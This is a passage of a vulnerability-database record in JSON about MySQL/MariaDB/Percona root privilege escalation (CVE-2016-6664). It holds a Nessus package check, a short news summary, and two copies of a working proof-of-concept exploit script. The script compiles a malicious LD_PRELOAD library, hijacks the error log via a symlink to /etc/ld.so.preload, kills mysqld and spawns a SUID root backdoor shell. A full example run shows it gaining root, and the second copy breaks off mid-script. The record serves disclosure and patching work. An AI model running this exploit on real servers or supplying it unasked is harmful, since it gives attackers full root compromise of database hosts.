script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libmariadbd-dev\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-client\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-client-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-client-core-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-common\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-connect-engine-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-oqgraph-engine-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-server\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-server-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-server-core-10.0\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-test\", reference:\"10.0.29-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mariadb-test-10.0\", reference:\"10.0.29-0+deb8u1\")) 
flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2016-11-08T20:52:45", "bulletinFamily": "info", "cvelist": ["CVE-2016-6663", "CVE-2016-6664"], "edition": 1, "description": "![](/Article/UploadPic/2016-11/20161153331208.png?www.myhack58.com) \nLast week, a Polish hacker named Dawid Golunski discovered two MySQL vulnerabilities: a remote root code execution flaw and a privilege escalation flaw. At the time, Golunski only provided a PoC for the first vulnerability, but committed to disclosing further details of the second (CVE-2016-6663) later. \nOn Tuesday, Golunski published PoCs for two vulnerabilities: the first PoC is for the previously announced high-risk privilege escalation vulnerability, and the other is for a new root privilege escalation vulnerability; by exploiting it, an attacker can gain access to the entire database. \nVulnerability number \nCVE-2016-6663 \nCVE-2016-6664 \nVulnerability \nMySQL version \n\n\nMySQL derived versions: Percona Server, MariaDB \nVulnerability description \nElevation of Privilege/race condition Vulnerability (CVE-2016-6663) \nOf the two vulnerabilities released this week, the more serious is the race condition vulnerability: it allows a low-privileged account that has CREATE/INSERT/SELECT privileges to elevate its privileges and execute arbitrary code as the system user. \nOnce the vulnerability is exploited, the hacker can gain access to all databases on the database server. 
\nRoot privilege escalation (CVE-2016-6664) \nThe other vulnerability is a root privilege escalation vulnerability that allows an attacker with MySQL system-user rights to elevate privileges to root in order to attack the entire system. \nThe cause of the problem is that the MySQL error log and other files are not handled securely enough: these files can be replaced with arbitrary system files, which can be exploited to obtain root privileges. \nThis vulnerability chains well with the previously mentioned privilege elevation vulnerability: hackers first use the privilege elevation vulnerability (CVE-2016-6663) to go from an ordinary user to the system user, then use the root privilege elevation vulnerability (CVE-2016-6664) to further escalate to the root user. \nAll of these vulnerabilities can be exploited in a shared environment. In a shared environment, users have access to separate databases, and through these vulnerabilities hackers can gain access to all databases. \n\n\n## Vulnerability PoC\n\nGolunski has released PoC code for both vulnerabilities: [exploit 1](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>) and [vulnerability 2](<https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html>).\n\nMySQL has fixed the two vulnerabilities and released the patches in last month's quarterly update. \nSolution \nWe strongly advise webmasters to install the patch quickly. If you cannot install the patches immediately, a temporary workaround is to disable symbolic link support in the database server configuration by setting symbolic-links = 0 in my.cnf. 
\n\n", "modified": "2016-11-05T00:00:00", "published": "2016-11-05T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/80901.htm", "id": "MYHACK58:62201680901", "type": "myhack58", "title": "MySQL is now a high-risk vulnerability that can cause the server root permission is stealing-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-10T07:01:49", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-02T00:00:00", "type": "zdt", "title": "MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5617", "CVE-2016-6664"], "modified": "2016-11-02T00:00:00", "href": "https://0day.today/exploit/description/26205", "id": "1337DAY-ID-26205", "sourceData": "=============================================\r\n- Release date: 01.11.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-6664 / OCVE-2016-5617\r\n- http://legalhackers.com\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nMariaDB / MySQL / PerconaDB - Root Privilege Escalation\r\n \r\nMySQL \r\n <= 5.5.51\r\n <= 5.6.32\r\n <= 5.7.14\r\n \r\nMariaDB\r\n All current\r\n \r\nPercona Server\r\n < 5.5.51-38.2\r\n < 5.6.32-78-1\r\n < 5.7.14-8\r\n \r\nPercona XtraDB Cluster\r\n < 5.6.32-25.17\r\n < 5.7.14-26.17\r\n < 5.5.41-37.0\r\n \r\n \r\nII. 
BACKGROUND\r\n-------------------------\r\n \r\nMySQL:\r\n \r\n\"MySQL is the world's most popular open source database.\r\nWhether you are a fast growing web property, technology ISV or large\r\nenterprise, MySQL can cost-effectively help you deliver high performance,\r\nscalable database applications.\"\r\n \r\n\"Many of the world's largest and fastest-growing organizations including\r\nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time\r\nand money powering their high-volume Web sites, business-critical systems and\r\npackaged software.\"\r\n \r\nhttp://www.mysql.com/products/\r\nhttp://www.mysql.com/why-mysql/\r\n \r\n--\r\n \r\nMariaDB:\r\n \r\n\"MariaDB is one of the most popular database servers in the world. \r\nIt\u2019s made by the original developers of MySQL and guaranteed to stay open source. \r\nNotable users include Wikipedia, WordPress.com and Google.\r\n \r\nMariaDB turns data into structured information in a wide array of applications, \r\nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \r\nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \r\nstorage engines, plugins and many other tools make it very versatile for a wide \r\nvariety of use cases.\"\r\n \r\nhttps://mariadb.org/about/\r\n \r\n--\r\n \r\nPerconaDB:\r\n \r\n\"Percona Server for MySQL is a free, fully compatible, enhanced, open source \r\ndrop-in replacement for MySQL that provides superior performance, scalability \r\nand instrumentation. \r\nWith over 3,000,000 downloads, Percona Server\u2019s self-tuning algorithms and support\r\nfor extremely high-performance hardware delivers excellent performance and reliability.\"\r\n \r\nhttps://www.percona.com/software/mysql-database/percona-server\r\n \r\n \r\nIII. 
INTRODUCTION\r\n-------------------------\r\n \r\nMySQL-based databases including MySQL, MariaDB and PerconaDB are affected\r\nby a privilege escalation vulnerability which can let attackers who have\r\ngained access to mysql system user to further escalate their privileges\r\nto root user allowing them to fully compromise the system.\r\nThe vulnerability stems from unsafe file handling of error logs and\r\nother files.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nThe error.log file on most default installations of MySQL/PerconaDB/MariaDB\r\ndatabases is stored either in /var/log/mysql or /var/lib/mysql directory.\r\n \r\nThe permissions on the file and directory look as follows:\r\n \r\n[email\u00a0protected]:/var/lib/mysql# ls -la /var/log/mysql\r\ntotal 468\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 .\r\ndrwxrwxr-x 36 root syslog 4096 Sep 11 06:25 ..\r\n-rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log\r\n \r\n[email\u00a0protected]:/var/lib/mysql# ls -lad /var/log/mysql\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql\r\n \r\n \r\nmysqld_safe wrapper that is normally used for starting MySQL daemon and \r\ncreating/reopening the error.log performs certain unsafe file operations that\r\nmay allow attackers to gain root privileges.\r\n \r\nThe wrapper script contains a 'while' loop shown below which monitors the mysqld \r\nprocess and performs a restart in case of the process failure. \r\nThe restart involves re-creation of the error.log file if syslog logging has\r\nnot been configured instead of error log files (file-based logging is the \r\ndefault setting on most installations).\r\n \r\n \r\n--------[ mysqld_safe ]--------\r\n[...]\r\n \r\nwhile true\r\ndo\r\n rm -f \"$pid_file\" # Some extra safety\r\n \r\n start_time=`date +%M%S`\r\n \r\n eval_log_error \"$cmd\"\r\n \r\n if [ $want_syslog -eq 0 -a ! -f \"$err_log\" ]; then\r\n touch \"$err_log\" # hypothetical: log was renamed but not\r\n chown $user \"$err_log\" # flushed yet. 
we'd recreate it with\r\n chmod \"$fmode\" \"$err_log\" # wrong owner next time we log, so set\r\n fi # it up correctly while we can!\r\n \r\n[...]\r\n \r\n-------------------------------\r\n \r\nAs can be seen, the error.log file is created (touch) and chowned to the user\r\nrunning the mysqld daemon (typically 'mysql'). \r\n \r\nThe operation is vulnerable to a symlink attack.\r\n \r\nAttackers who obtained access to mysql account for example through CVE-2016-6663\r\nvulnerability described at:\r\n \r\nhttp://legalhackers.com/advisories/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-OCVE-2016-5616-Exploit.html\r\n \r\nwould gain access to /var/log or /var/lib/mysql directories (owned by mysql user) \r\nand could therefore easily remove the error.log file and replace it \r\nwith a symlink to an arbitrary system file which would result in creating an\r\narbitrary file on the system with mysql privileges and could be used to escalate\r\nprivileges.\r\n \r\nThe privilege escalation could be triggered instantly (without the need to wait\r\nfor mysql service restart/reboot) by attackers having 'mysql' account by simply \r\nkilling the mysqld child process (launched by the mysqld_safe wrapper).\r\n \r\nWhen the mysqld process gets terminated, the wrapper will then re-iterate the \r\nloop shown above and immediately create a mysql-owned file in the location \r\nspecified by the attacker in the symlink thus allowing attackers to quickly\r\nescalate their privileges.\r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n \r\n-------[ mysql-chowned.sh ]------\r\n \r\n#!/bin/bash -p\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 
1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# http://legalhackers.com\r\n#\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n# See full advisory for details at:\r\n#\r\n# http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n \r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n \r\nfunction cleanexit {\r\n # Cleanup \r\n echo -e \"\\n[+] Cleaning up...\"\r\n rm -f $PRIVESCSRC\r\n rm -f $PRIVESCLIB\r\n rm -f $ERRORLOG\r\n touch $ERRORLOG\r\n if [ -f /etc/ld.so.preload ]; then\r\n echo -n > /etc/ld.so.preload\r\n fi\r\n echo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n exit $1\r\n}\r\n \r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n cleanexit 0\r\n}\r\n \r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 
1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n \r\n# Args\r\nif [ $# -lt 1 ]; then\r\n echo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n echo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n exit 3\r\nfi\r\n \r\n# Priv check\r\n \r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n echo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n exit 3\r\nfi\r\n \r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n echo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\"\r\n exit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n \r\n# [ Active exploitation ]\r\n \r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n \r\nuid_t geteuid(void) {\r\n static uid_t (*old_geteuid)();\r\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n if ( old_geteuid() == 0 ) {\r\n chown(\"$BACKDOORPATH\", 0, 0);\r\n chmod(\"$BACKDOORPATH\", 04777);\r\n //unlink(\"/etc/ld.so.preload\");\r\n }\r\n return old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n echo -e \"\\n[!] 
Failed to compile the privesc lib $PRIVESCSRC.\"\r\n cleanexit 2;\r\nfi\r\n \r\n \r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n \r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n echo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n exit 2\r\nfi\r\n \r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n echo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n cleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n \r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n echo -e \"Got it. Executing 'killall mysqld' now...\"\r\n killall mysqld\r\nfi\r\nwhile :; do \r\n sleep 0.1\r\n if [ -f /etc/ld.so.preload ]; then\r\n echo $PRIVESCLIB > /etc/ld.so.preload\r\n rm -f $ERRORLOG\r\n break;\r\n fi\r\ndone\r\n \r\n# /etc/ dir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n \r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n \r\n#while :; do \r\n# sleep 0.1\r\n# ps aux | grep mysqld | grep -q 'log-error'\r\n# if [ $? 
-eq 0 ]; then\r\n# break;\r\n# fi\r\n#done\r\n \r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n echo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n echo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n echo -e \"\\n[!] Failed to get root\"\r\n cleanexit 2\r\nfi\r\n \r\n \r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n \r\n# Job done.\r\ncleanexit 0\r\n \r\n \r\n \r\n------------EOF------------------\r\n \r\n \r\nExample run\r\n~~~~~~~~~~~~~~~~\r\n \r\nmysql_suid_shell.MYD-4.3$ whoami\r\nmysql\r\n \r\nomysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server\r\niU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server\r\niF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries\r\n \r\nmysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err \r\n \r\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \r\nmysql-chowned.sh (ver. 
1.0)\r\n \r\nCVE-2016-6664 / OCVE-2016-5617\r\n \r\nDiscovered and coded by: \r\n \r\nDawid Golunski \r\nhttp://legalhackers.com \r\n \r\n[+] Starting the exploit as \r\nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)\r\n \r\n[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err\r\n \r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n \r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n \r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload\r\n \r\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\r\nDo you want to kill mysqld process to instantly get root? :) ? [y/n] y\r\nGot it. Executing 'killall mysqld' now...\r\n \r\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \r\n-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload\r\n \r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n \r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n \r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n \r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n \r\nGot root! The database server has been ch-OWNED !\r\n \r\n[+] Spawning the rootshell /tmp/mysqlrootsh now! \r\n \r\nmysqlrootsh-4.3# whoami\r\nroot\r\n \r\nmysqlrootsh-4.3# exit\r\nexit\r\n \r\n[+] Cleaning up...\r\n \r\n[+] Job done. Exiting with code 0\r\n \r\n \r\n \r\nVideo PoC:\r\n~~~~~~~~~~~~~\r\n \r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n \r\n \r\nVI. 
BUSINESS IMPACT\r\n-------------------------\r\n \r\nAttackers who obtained mysql account through other vulnerabilities\r\n(such as CVE-2016-6663) could use this exploit to gain root access\r\nand fully compromise the system.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nMySQL \r\n <= 5.5.51\r\n <= 5.6.32\r\n <= 5.7.14\r\n \r\nMariaDB\r\n All current\r\n \r\nPercona Server\r\n < 5.5.51-38.2\r\n < 5.6.32-78-1\r\n < 5.7.14-8\r\n \r\nPercona XtraDB Cluster\r\n < 5.6.32-25.17\r\n < 5.7.14-26.17\r\n < 5.5.41-37.0\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nVendors have released patches after private disclosure.\r\nUpdate to the latest version of your DBMS.\r\n \r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com\r\n \r\nThis advisory:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n \r\nExploit source code:\r\nhttp://legalhackers.com/exploits/mysql-chowned.sh\r\n \r\nCVE-2016-6663 vulnerability which can allow attackers to obtain 'mysql' system account:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n \r\nVideo PoC:\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n \r\nCVE-2016-6664\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664\r\n \r\nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/26205", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-11-02T13:29:37", "description": "MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation. CVE-2016-5617,CVE-2016-6664. 
Local exploit for Linux platform", "published": "2016-11-01T00:00:00", "type": "exploitdb", "title": "MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5617", "CVE-2016-6664"], "modified": "2016-11-01T00:00:00", "id": "EDB-ID:40679", "href": "https://www.exploit-db.com/exploits/40679/", "sourceData": "#!/bin/bash -p\r\n#\r\n# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# https://legalhackers.com\r\n#\r\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n#\r\n# See the full advisory for details at:\r\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Video PoC:\r\n# 
https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n#\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $ERRORLOG\r\n\ttouch $ERRORLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Priv check\r\n\r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. 
Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\t//unlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\texit 2\r\nfi\r\n\r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho 